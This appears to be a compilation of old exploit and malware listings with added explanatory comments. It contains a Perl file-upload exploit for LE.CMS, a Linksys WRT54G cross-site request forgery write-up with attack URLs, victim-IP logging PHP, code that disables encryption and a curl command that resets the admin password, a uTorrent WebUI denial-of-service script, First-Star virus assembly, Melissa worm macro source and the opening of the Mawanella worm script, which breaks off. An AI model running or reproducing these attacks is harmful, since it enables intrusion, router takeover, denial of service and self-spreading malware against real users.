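# Restored from the HTML listing: the heredoc opener (print <<INTRO;) and the
# two <STDIN> reads had been eaten as tags.
# Fixes: a path without an extension no longer yields a bogus one-character
# extension (rindex returns -1, substr($file, -1) is the last character); the
# local file is checked before the request; the HTTP status is shown on failure.

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

print <<INTRO;
- - - - - - - - - - - - - - - - - - - - - - - - - - - -
- LE.CMS <= 1.4 Remote Arbitrary File Upload Exploit -
- -
- -
- Discovered && Coded By: t0pP8uZz -
- Discovered On: 19 JUNE 2008 -
- -
- Script Download: http://worldlevel.com -
- milw0rm.com, h4ck-y0u.org, CiperCrew, offsec -
- -
- LE.CMS suffers from a arbitrary file upload vuln.. -
- .. this exploit will upload any file to the server -
- - - - - - - - - - - - - - - - - - - - - - - - - - - -
INTRO

print "\nEnter Target URL(ie: http://site.com): ";
chomp(my $host = <STDIN>);
$host =~ s{/+$}{};    # avoid "http://site.com//cms/..." when a trailing slash is typed

print "\nEnter Local File Path To Upload(ie: C:\\file.txt): ";
chomp(my $file = <STDIN>);
die "Exploit Failed, cannot read local file '$file': $!\n" unless -r $file;

my $dot   = rindex $file, '.';
my $ext   = $dot >= 0 ? substr($file, $dot) : '';   # extension including the dot, or none
my $fname = int rand 9999;
my $ua    = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );

my $re = $ua->request(POST $host . '/cms/admin/upload.php',
    Content_Type => 'form-data',
    Content => [ 'submit0'  => 'authed', # if script reads this as TRUE then the script thinks we have already authenticated the username/password, only 0 or undef is false
                 'submit'   => 1,
                 'password' => 1,        # as long as this is true we should be able to upload
                 'filename' => $fname,
                 'upload'   => [ $file ] ] );

die "Exploit Failed, HTTP Request Failed! (" . $re->status_line . ")\n" unless $re->is_success;

# NOTE: is_success only says the POST got a 2xx; a login page returned with 200
# looks the same.  Fetch the printed URL to confirm the file really is there.
print "File Uploaded! Location: " . $host . "/cms/images/" . $fname . $ext . "\n";
exit;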

#Linksys WRT54G (firmware 1.00.9) Security Bypass

###################################
#Linksys WRT54G (firmware 1.00.9) Security Bypass
###################################

__ _ ____ ____ ___ ____ ____ ____ _____ ____ ____ _____ ___
| l/ ]l j| \ / \ | \l j| \ | T l j| \ | | / \
| ' / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y
| \ | | | | || Q || _/ | | | | || __j | | | | || l_ | O |
| Y | | | | || || | | | | | || / | __ | | | | || _] | |
| . | j l | | |l || | j l | | || || T j l | | || T l !
l__j\_j|____jl__j__j \__,_jl__j |____jl__j__jl_____jl__j|____jl__j__jl__j \___/

<>< | ><> Hacking the Linksys WRT54G #2
<>< | ><> https://kinqpinz.info/
<>< | ><> by meathive
<>< | ><> root at kinqpinz.info && kinqpinz.info at gmail.com


++| CVE-2008-1247
----------------------
The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials
when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via
a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri,
(6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri,
(12) PortRange.tri,(13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri,
(17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri.
NOTE: the Security.tri vector is already covered by CVE-2006-5202.

++| Intro
----------------------
This text is in addition to the findings I have already made public regarding the Linksys WRT54G
wireless router and firewall gateway device. The scripts that process configuration changes do not
require authentication, and because the router sits at a predictable LAN address they can be driven
_remotely_ in the classic cross-site request forgery manner: an attacker's web page makes the victim's
own browser - which is inside the LAN - submit a simple HTML form, optionally auto-submitted with
JavaScript. Please refer to the bottom of this text for my previous findings and the demo page with
sample exploits.

++| Let's Get Dirty
----------------------
You may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows
how forms can be constructed in HTML that take advantage of the major flaws present within the
insecure router. In my previous documentation I showed how it is possible to alter configuration
parameters both via Linux command line using curl and HTML form submissions. In this text I
demonstrate how to do these very same things transparently using a combination of HTML form
construction with JavaScript that automagically submits our desired changes.

The JavaScript is simple and is only used for submitting the form - a mechanism that needs no user
interaction: it navigates the user's browser to their router, which may then show its login prompt.
Once again, THE REQUEST TO AUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS
SETTINGS. The following is all
that is required in order to submit our form that will be constructed using GET parameters observed
from the device's Web interface.

document.f.submit();

This submits forms hidden within the Webpage. Our first example code enables wireless access with an
SSID of our choosing. In this instance, I will use the SSID "kinqpinz".














The reason this works is simple: configuration parameters are constructed in the URL in the Web
interface, hosted by default at the address http://192.168.1.1. One can view these parameters while
configuring their device. The code above simply constructs a URL that is processed by the router's
IOS script WBasic.tri. The URL resembles the following if you were to view it within your browser:

http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en

It's simple enough to understand what's going on. Each variable passed in the URL describes exactly
what its purpose is - at least the important ones such as "SSID" and "channel". The only tricky part
to exploiting the router is the fact that you cannot alter settings using a URL like the one above.
That would result in a GET request on behalf of the device, whereas we're interested in POST
requests that actually trigger configuration changes. A GET request does nothing. Below I describe
a real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript,
and a touch of PHP to grab the mark's external IP.

++| Remote Real World Attack Scenario
----------------------
So http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It
has made a few assumptions about your environment, however. One major assumption is that you've
kept your router's default local gateway address, namely 192.168.1.1. No matter what other changes
you've made to the router in terms of security, e.g., strong password, wireless encryption, access
restrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do
NOT retain the default local address of 192.168.1.1. It is important that you change this address so
that you do not fall victim to a malicious individual hosting code like that presented in this text.
Note, however, that this only takes away the attacker's easy guess: a page can still try other common
gateway addresses, and the scripts themselves stay unauthenticated, so treat it as a mitigation rather
than a fix - the root cause can only be addressed in the firmware.

++| Remote Real World Attack Scenario Requirements
----------------------
On http://www.hacker.tld a page is hosted that contains the following:
(1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely;
(2) JavaScript that submits these forms transparently;
(3) PHP or similar server-side code that acquires the mark's external IP address as they browse
the page; and,
(4) PHP or similar server-side code that retains the mark's external IP address in the event that
the remote form submission is successful, thus allowing the remote attacker to further exploit the
device.

http://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP
is used - though any server-side language is suitable - for obtaining the external IP of any
individual viewing the exploit page and writes this information to a log file.
// Logs the visiting browser's source address so the attacker can later probe
// that address from outside.  (The opening "<?php" tag was lost in the listing.)
// NOTE(review): REMOTE_ADDR is the TCP peer; behind a reverse proxy or CDN it
// would be the proxy's address rather than the mark's - verify for the host.
$ip=$_SERVER['REMOTE_ADDR'];
$toWrite="Potential mark resides at $ip\n\n";
$f=fopen("mark.txt", "a+");   // append mode: the log is never truncated
fwrite($f, $toWrite);
fclose($f);
?>

The JavaScript is as simple as retrieving the form object identified by the 'name' HTML attribute
and submitting the form.



All hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the
HTML form's 'hidden' attribute.














What you should observe from this is the form name of "f" which is used in the JS to submit the form
as well as the various 'name' and 'value' attributes that are used to create a URL such as this:

submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en

Do note that without any one of these parameters, the exploit fails and nothing changes. All of the
elements must remain in place even if they do not directly make sense. They are simply options that
the processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case
matters and do not forget that the request must be POST, not GET. Also different config changes
require different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log.

Now that the malicious page has been composed and sits online living and waiting for marks at
http://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom
PHP logging script. In mark.txt, our logging file, sample output would resemble something like the
following.

Potential mark resides at 1.1.1.1

Potential mark resides at 2.2.2.2

Potential mark resides at 3.3.3.3

So forth...

They are potential marks because it is unknown whether or not they are using the WRT54G with a
supported firmware version that is exploitable using these techniques, and/or the exploit attempt
failed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not
using the default local address (good for them) that this attack relies on.

When they browse the page, because we have set no timeout for this change to occur, they are
instantly redirected to http://192.168.1.1/WBasic.tri. Because the submission is a POST, the
parameters do not show up in the address bar, so even a reasonably educated user sees little sign
of what has just happened and will, more often than not, carry on with whatever they were doing.
At the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at
our leisure and further test the remote host whether or not they are vulnerable to attack. At the
very least, we may decide to completely reset the router to rest assured we know its current state
to make further compromise a snap, such as altering the device's DNS records for sniffing traffic.
This is quite feasible, here's how.







This gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en

Now we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs
all incoming and outgoing requests before passing them on to the next in line.























































This is indeed convoluted but all of these values must be in place in order to be successful. What
is it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our
own custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8,
and DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while
obtaining its dynamic IP from the ISP. In case you're curious, these forms are used to construct the
following URL that is submitted to http://192.168.1.1/Basic.tri.

http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en

++| An Alternative (with JavaScript)
----------------------
This is the basic exploitation method of the router although the attacker has many alternatives of
submitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript.
A few alternative methods would include using a JavaScript onClick function within a standard
looking HTML anchor tag to submit the information with XMLHttpRequest, e.g.:

This looks innocent enough.

...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this
standard looking navigation link, e.g.:

// Cross-browser XMLHttpRequest handle: the native object where available,
// otherwise the legacy IE ActiveX control.  Reused by xhrRequest() below.
var xhr=false;
if(window.XMLHttpRequest) {
xhr=new XMLHttpRequest();
} else if(window.ActiveXObject) {
xhr=new ActiveXObject("Microsoft.XMLHTTP");
}
// Fires a form-encoded POST to the router's Security.tri with SecurityMode=0
// (described in the surrounding text as disabling wireless encryption).  The
// request comes from the victim's browser, i.e. from inside the LAN.
// NOTE(review): a cross-origin XHR is subject to the same-origin policy -
// browsers of the 2008 era refused it outright, CORS-era browsers send this
// form-encoded POST without a preflight but hide the response, so the
// readyState/status handler below never sees a readable reply.  The plain
// HTML-form method shown earlier has no such restriction.
function xhrRequest() {
if(xhr) {
xhr.open("POST", "http://192.168.1.1/Security.tri", true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.onreadystatechange=function() {
if(xhr.readyState == 4 && xhr.status == 200) {
var success=xhr.responseText;   // only stored, never used
}
}
xhr.send("SecurityMode=0&layout=en");
}
}

The example above effectively disables all wireless encryption so that if you happen to live close
enough to this poor individual, it is your duty to pwn their wireless by enabling open access for
everybody in the neighborhood! Here's the URL for disabling wireless encryption:

http://192.168.1.1/Security.tri?SecurityMode=0&layout=en

++| An Alternative (without JavaScript)
----------------------
You're still exploitable even if you do not allow scripts from executing, e.g., you use Firefox +
NoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent
looking methods of compromising your WRT54G. For example, user registration for a bulletin board or
forum system. The site must acquire a minimal amount of information in order to create the account
so it is in submitting this data that we may submit our own payload, perhaps this time we'd like to
enable DMZ for complete access to any and all shares/services on our mark's computer. Here is the
URL once again:

http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en

Again it is a different script processing the request on behalf of the router's internal operating
system, dmz.tri, but it still does not require authentication prior to changing the settings we wish
to change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.:







...and add these values to their user registration page with standard username/password/e-mail fields...

Username:

Password:

Confirm Password:




...that can be found on traditional forums these days. The mark submits and exploits his/her own
router although they believe they are at least minimally technically savvy by using a combination of
technologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms
we use to store the router configs are hidden, and the normal user registration forms are not, thus
it is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has
detected that a potential attack is taking place it is likely too late as the mastermind behind
http://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up
targets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration
changes within 10 seconds, which is plenty of time for them to open another terminal and change the
administrative login to block our mark from changing their settings, e.g.:

curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=pwn&http_passwdConfirm=pwn&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http://[mark's external IP from mark.txt]/manage.tri

Here the hacker can now log in as admin with password 'pwn' with complete freedom to _REMOTELY_
monitor the mark's internal and outgoing network traffic. (Caveat: the request above also sends
remote_management=0, which - judging by its name - turns WAN-side administration off; to log in from
the outside the attacker would presumably need that parameter enabled. Verify against the device.)
This can allow for capturing passwords via DNS poisoning on the router, man-in-the-middle attacks by
pointing the local address of the router to a rogue DHCP server and accordingly, rogue network of the
attacker's, plus more.

++| Conclusion
----------------------
It is my intention in finalizing this document that the reader understands that the Linksys WRT54G
firmware version 1.00.9 does not care whether you are inside or outside its local network - any web
page the user visits can make their browser issue the request from the inside. Nor does it care
whether or not you have the level of privilege thought to be necessary for manipulating sensitive
objects.

Thanks go to hw2B for suggesting I write all of this garbage out.

++| URLs
----------------------
https://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document)
https://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008)
https://kinqpinz.info/lib/wrt54g/own2.txt (this document)
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247)

uTorrent / BitTorrent WebUI DoS exploit

###################################
#uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit
###################################

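#!/usr/bin/perl
# uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service exploit
# according to the following advisory: http://secunia.com/advisories/30605
#
# usage: WebUI-dos.pl <host[/path]> <port> <user:pass>
# Exploit written by Exodus.
# http://www.blackhat.org.il
#
# Sends a single authenticated GET for /gui/common.js whose Range header carries a
# 60000-byte value; per the advisory the oversized Range value is what brings the
# WebUI down.  The path part of the first argument is accepted but ignored.
#
# Fixes: strict/warnings with lexicals; the connect error shows $!; the Basic
# credentials are encoded without line breaks (encode_base64 wraps at 76 chars,
# and chomp() only removed the final newline, so long user:pass values produced
# a broken Authorization header); the argument placeholders lost in the HTML
# listing are restored.

use strict;
use warnings;
use IO::Socket;
use MIME::Base64;

usage() if @ARGV < 3;

my ($host) = split m{/}, $ARGV[0];      # "host/gui/common.js" -> "host"
my $port   = $ARGV[1];

my $sock = IO::Socket::INET->new(PeerAddr => "$host:$port", Proto => 'TCP')
    || die("[X]Couldnt connect to host: $host:$port ($!)\n");
my $buff = "E" x 60000;
my $up   = encode_base64($ARGV[2], '');  # '' as EOL: no wrapping, no trailing newline

print $sock "GET /gui/common.js HTTP/1.1\r\n" .
            "Host: $host\r\n" .
            "Authorization: Basic $up\r\n" .
            "Range: bytes=$buff\r\n" .
            "Connection: close\r\n\r\n";

close($sock);

print "[!]Payload sent, WebUI should be down...\n";

sub usage
{
    print "usage $0 <host[/path]> <port> <user:pass>\n" .
          "ex: $0 127.0.0.1/gui/common.js 1337 admin:admin\n";
    exit;
}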

First-Star virus

####################################1ST_STAR.ASM###################################;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;
; First-Star / 222 Virus
;
; (C) by Glenn Benton in 1992
; This is a non-resident direct action .COM infector in current dirs.
;
;
;
; First-Star / 222: non-resident, direct-action .COM infector (DOS, 16-bit).
; Infected-file layout (see Infect): the host's original first 4 bytes are
; saved in OrgPrg, the virus body (MainVir .. MainVir+VirLen) is appended to
; the end of the file, and the file's first 4 bytes become "E9 lo hi 2A" - a
; JMP to the appended body followed by the '*' infection marker that Found:
; checks at byte 3 to skip files already infected.
; All data is addressed via BP (delta offset) because the body runs at an
; arbitrary offset inside the host.
Org 0h
Start: Jmp MainVir
Db '*'                                  ; infection marker, byte 3 of the file
MainVir: Call On1
On1: Pop BP                             ; BP = (actual address of On1) - (assembled address) = load delta
Sub BP,Offset MainVir+3
Push Ax
Mov Ax,Cs:OrgPrg[BP]                    ; put the host's saved first 4 bytes back at CS:100h
Mov Bx,Cs:OrgPrg[BP]+2
Mov Cs:Start+100h,Ax
Mov Cs:Start[2]+100h,Bx
Mov Ah,1ah                              ; INT 21h/1Ah: set DTA to CS:FD00h (leaves the PSP's default DTA alone)
Mov Dx,0fd00h
Int 21h
Mov Ah,4eh                              ; INT 21h/4Eh: find first "*.COM" (re-entered with 4Fh = find next)
Search: Lea Dx,FileSpec[BP]
Xor Cx,Cx                               ; attribute mask 0: normal files
Int 21h
Jnc Found
Jmp Ready                               ; nothing (more) found: run the host
Found: Mov Ax,4300h                     ; INT 21h/4300h: get attributes of the found file (name at DTA+1Eh)
Mov Dx,0fd1eh
Int 21h
Push Cx                                 ; keep the attributes for Close to restore
Mov Ax,4301h                            ; INT 21h/4301h: clear attributes so a read-only file can be written
Xor Cx,Cx
Int 21h
Mov Ax,3d02h                            ; INT 21h/3D02h: open read/write; AX = handle
Int 21h
Mov Bx,5700h                            ; INT 21h/5700h: get file date/time (handle moved to BX by the XCHG)
Xchg Ax,Bx
Int 21h
Push Cx                                 ; keep time (CX) and date (DX) so Close can restore them
Push Dx
Mov Ah,3fh                              ; INT 21h/3Fh: read the first 4 bytes into OrgPrg
Lea Dx,OrgPrg[BP]
Mov Cx,4
Int 21h
Mov Ax,Cs:[OrgPrg][BP]
Cmp Ax,'MZ'                             ; skip EXE images that merely carry a .COM name
Je ExeFile
Cmp Ax,'ZM'
Je ExeFile
Mov Ah,Cs:[OrgPrg+3][BP]
Cmp Ah,'*'                              ; byte 3 == '*': already infected, skip
Jne Infect
ExeFile: Call Close
Mov Ah,4fh                              ; find next
Jmp Search
FSeek: Xor Cx,Cx                        ; helper: LSEEK (INT 21h/42h) to offset 0 with the mode already in AL
Xor Dx,Dx
Int 21h
Ret
Infect: Mov Ax,4202h                    ; seek to end of file; AX = file length (DX ignored)
Call FSeek
Sub Ax,3                                ; JMP rel16 is relative to the byte after the 3-byte JMP at offset 0
Mov Cs:CallPtr[BP]+1,Ax
Mov Ah,40h                              ; append the virus body to the file
Lea Dx,MainVir[BP]
Mov Cx,VirLen
Int 21h
Mov Ax,4200h                            ; seek back to offset 0
Call FSeek
Mov Ah,40h                              ; overwrite the first 4 bytes: E9 lo hi + the '*' that follows CallPtr
Lea Dx,CallPtr[BP]
Mov Cx,4
Int 21h
Call Close
Ready: Mov Ah,1ah                       ; restore the default DTA at PSP:80h
Mov Dx,80h
Int 21h
Pop Ax
Mov Bx,100h                             ; far return to CS:100h, the restored host entry point
Push Cs
Push Bx
Retf
Close: Pop Si                           ; return address parked in SI while the saved values are popped
Pop Dx                                  ; date
Pop Cx                                  ; time
Mov Ax,5701h                            ; INT 21h/5701h: restore date/time so the file looks untouched
Int 21h
Mov Ah,3eh                              ; INT 21h/3Eh: close handle
Int 21h
Mov Ax,4301h                            ; INT 21h/4301h: restore the original attributes (pushed first in Found)
Pop Cx
Mov Dx,0fd1eh
Int 21h
Push Si
Ret
CallPtr Db 0e9h,0,0                     ; JMP rel16 patched by Infect; its 4th byte is FileSpec's '*'
FileSpec Db '*.COM',0
OrgPrg: Int 20h                         ; saved first 4 bytes of the host (INT 20h = terminate, for a bare run)
Nop
Nop
VirLen Equ $-MainVir
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;


Melissa virus

####################################melissa###################################// Melissa Virus Source Code
' Document_Open: entry point of the Melissa macro worm, run whenever an
' infected document is opened.  In order: lowers Word's macro security,
' mass-mails the document through Outlook (once per user profile, gated by a
' registry marker), then copies its own code between the document and
' Normal.dot so both stay infected.
' NOTE: several statements below are wrapped onto two lines by the listing
' without VBA's "_" continuation (the If at the top, the Subject/Body
' assignments, the CYA test, the final TypeText); they were single lines.
Private Sub Document_Open()
' Every runtime error is swallowed so a failing step never stops the macro.
On Error Resume Next
' Word 2000 (Office 9.0 security key present): grey out the "Security..."
' menu item and set the macro security Level to 1 (lowest).  Otherwise
' (Word 97): disable Tools > Macro and switch off conversion prompts, the
' built-in virus protection warning and the Normal.dot save prompt.
' "(1 - 1)" is just an obfuscated 0 / False.
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
' Outlook automation handles.
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
' Mailing runs only while the "Melissa?" marker under HKCU\...\Office\ is
' not yet set, i.e. at most once per user profile.
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
' One message per address list, addressed to its first 50 entries
' (the "If x > 50" line ends the inner loop early) and carrying the
' current document as the attachment.
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
' Set the marker so this user is never mailed from again.
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\",
"Melissa?") = "... by Kwyjibo"
End If
' Replication between the document's and Normal.dot's VBA project
' (component 1 of each).  Whichever is not yet named "Melissa" is emptied,
' renamed and becomes the copy destination; the code is then copied line by
' line from the other one, starting at line 2 (BGN), under a new
' Document_Close header in Normal.dot or Document_Open in the document.
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
' When Normal.dot's module already had code and the document's had none
' (i.e. the document was just infected from the template) and the document
' is not an unsaved "DocumentN", save it under its own name; an unsaved one
' is merely flagged as saved.
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =
False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email Word 97 <--> Word 2000 ... it's a new age!
' Easter egg: when the day of the month equals the current minute, a quote
' is typed into the document.
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters. Game's over.
I'm outta here."
End Sub

Mawanella virus

####################################mawanella (original)###################################On Error Resume Next
Rem // I hate Mawanella incident
' Script prologue, executed before main(): creates the shell and filesystem
' helpers and reads the script's own source text.
' W_S is created here but never referenced anywhere in this listing.
Set W_S = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
' Opens its own file (WScript.ScriptFullname) for reading (mode 1 = ForReading)
' and keeps the whole text in vbscopy.  vbscopy is never used below -- main()
' replicates with fso.GetFile(...).Copy instead -- and no Close call for
' "file" appears in this listing.
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
' Worm body: copies this script into the Windows system folder, mails that
' copy to every entry of every Outlook address list, then shows a message box.
' Error handling is disabled for the whole routine, so any failure (Outlook not
' installed, no write access to the system folder, ...) is skipped silently.
On Error Resume Next
dim wscr,rr, strMsg
' wscr is created but never used; rr is declared but never used.
set wscr=CreateObject("WScript.Shell")
' FileSystemObject special folders: 0 = Windows, 1 = System, 2 = Temp.
' Only dirsystem is actually used below.
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
' Self-copy: drops this script as <System folder>\Mawanella.vbs.  That path
' and file name are the on-disk indicator of this worm.
